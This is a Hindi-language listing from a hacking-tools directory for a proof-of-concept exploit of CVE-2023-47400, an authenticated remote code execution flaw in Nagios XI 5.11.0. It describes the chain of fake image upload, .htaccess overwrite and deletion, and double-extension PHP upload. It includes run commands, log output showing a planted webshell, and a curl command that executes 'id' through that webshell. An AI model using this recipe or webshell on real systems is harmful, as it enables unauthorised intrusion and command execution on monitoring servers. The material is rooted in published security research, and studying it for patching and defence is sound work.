Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-47400 — CVE-2023-47400 के लिए प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/lucasvanhaaren/cve-2023-47400
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHublucasvanhaaren/cve-2023-47400

CVE-2023-47400

CVE-2023-47400 के लिए प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
2132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-47400

CVE-2023-47400 के लिए प्रमाण अवधारणा

प्रमाणीकृत PHP रिमोट कोड निष्पादन Nagios XI 5.11.0 पर मनमानी फ़ाइल लेखन के माध्यम से


[!Note] यह poc NCC समूह द्वारा प्रकाशित तकनीकी सलाह पर आधारित है https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/

यह poc इस प्रक्रिया का अनुसरण करता है :

  • placeholder.jpg नामक एक मान्य छवि अपलोड करें (केवल JFIF मैजिक बाइट्स हेडर, कोई सामग्री नहीं)
  • कस्टम इन्क्लूड की rename सुविधा का उपयोग करके छवि का नाम .htaccess में बदलें (जिसका प्रभाव मौजूदा .htaccess फ़ाइल को अधिलेखित करना है)
  • कस्टम इन्क्लूड की delete सुविधा का उपयोग करके .htaccess फ़ाइल को हटाएँ
  • एक PHP पेलोड अपलोड करें (JFIF मैजिक बाइट हेडर और .jpg.php डबल एक्सटेंशन के माध्यम से छवि हस्ताक्षर को धोखा देना)

इस भेद्यता का शोषण nagiosXI होस्ट पर रिमोट कोड निष्पादन की ओर ले जाता है, फ़ाइल अपलोड फ़िल्टर (फ़ाइल हस्ताक्षर और फ़ाइल एक्सटेंशन फ़िल्टर के माध्यम से) और PHP निष्पादन रोकथाम (.htaccess के माध्यम से) को बायपास करता है।

[!Warning] यह एक्सप्लॉइट होस्ट पर मौजूद <NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccess फ़ाइल को हटा देता है ताकि PHP कोड निष्पादन की अनुमति मिल सके!


उपयोग

  • प्रोजेक्ट सेटअप करें :
root@kitploit:~
# create a venv to dependency isolation
python3 -m venv .venv
source .venv/bin/activate
# run pip install before running the exploit
pip install -r requirements.txt
  • छवि अपलोड फ़ोल्डर में डालने के लिए PHP पेलोड को अनुकूलित करें

  • एक्सप्लॉइट स्क्रिप्ट चलाएँ :

root@kitploit:~
python exploit.py
# the exploit generates a webshell and upload it with uuid as filename
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
  • गिराए गए पेलोड के साथ इंटरैक्ट करें :
root@kitploit:~
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)
टूल डाउनलोड करें